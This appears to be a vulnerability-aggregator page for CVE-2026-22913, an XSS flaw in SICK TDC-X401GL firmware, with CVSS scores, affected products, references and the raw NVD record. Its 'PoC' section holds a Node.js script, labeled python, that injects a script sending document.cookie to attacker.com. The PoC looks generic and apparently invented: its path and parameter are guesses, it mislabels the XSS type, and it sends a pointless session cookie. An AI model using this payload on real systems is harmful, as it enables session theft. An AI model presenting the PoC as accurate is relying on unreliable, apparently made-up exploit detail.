CVE-2026-22913

Description

Improper handling of a URL parameter may allow attackers to execute code in a user's browser after login. This can lead to the extraction of sensitive data.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:sick:tdc-x401gl_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:sick:tdc-x401gl:-:*:*:*:*:*:*:* - NOT VULNERABLE

SICK产品(所有未修复版本)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2026-22913 PoC - Stored XSS via URL Parameter
// Target: SICK product with improper URL parameter handling

const http = require('http');

// Malicious payload to be injected via URL parameter
const xssPayload = '<script>fetch("https://attacker.com/steal?cookie="+document.cookie)</script>';

// Construct the malicious URL
const targetHost = 'vulnerable-sick-device.local';
const targetPath = '/login';
const maliciousParam = 'redirect';
const maliciousURL = `http://${targetHost}${targetPath}?${maliciousParam}=${encodeURIComponent(xssPayload)}`;

console.log('[+] CVE-2026-22913 PoC');
console.log('[+] Target:', targetHost);
console.log('[+] Malicious URL:', maliciousURL);

// Simulate sending the request to inject the payload
const options = {
  hostname: targetHost,
  port: 80,
  path: `${targetPath}?${maliciousParam}=${encodeURIComponent(xssPayload)}`,
  method: 'GET',
  headers: {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
    'Cookie': 'session=authenticated_user_cookie'
  }
};

const req = http.request(options, (res) => {
  console.log('[+] Request sent, payload injected');
  console.log('[+] When victim visits the page, cookie will be exfiltrated');
});

req.on('error', (e) => {
  console.error('[!] Error:', e.message);
});

req.end();

/*
Attack Scenario:
1. Attacker crafts a URL with XSS payload in parameter
2. Attacker tricks authenticated user to visit the URL
3. Payload gets stored (if reflected/stored XSS)
4. When other users visit the affected page, script executes
5. Attacker steals cookies/sensitive data
*/

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-22913
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-22913
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-22913/
[4] VulDB https://vuldb.com/cve/CVE-2026-22913
[5] https://sick.com/psirt
[6] https://www.cisa.gov/resources-tools/resources/ics-recommended-practices
[7] https://www.first.org/cvss/calculator/3.1
[8] https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.json
[9] https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.pdf
[10] https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-22913", "sourceIdentifier": "[email protected]", "published": "2026-01-15T13:16:06.100", "lastModified": "2026-01-23T15:30:41.030", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper handling of a URL parameter may allow attackers to execute code in a user's browser after login. This can lead to the extraction of sensitive data."}, {"lang": "es", "value": "Manejo inadecuado de un parámetro URL puede permitir a los atacantes ejecutar código en el navegador de un usuario después de iniciar sesión. Esto puede llevar a la extracción de datos sensibles."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sick:tdc-x401gl_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.5.0", "matchCriteriaId": "74DEFD78-EEE6-41B4-8E38-E6C5081206D0"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sick:tdc-x401gl:-:*:*:*:*:*:*:*", "matchCriteriaId": "9A95E220-0816-4885-AB7C-D0BB6F27DB7A"}]}]}], "references": [{"url": "https://sick.com/psirt", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.cisa.gov/resources-tools/resources/ics-recommended-practices", "source": "[email protected]", "tags": ["US Government Resource"]}, {"url": "https://www.first.org/cvss/calculator/3.1", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.json", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.pdf", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf", "source": "[email protected]", "tags": ["Product"]}]}}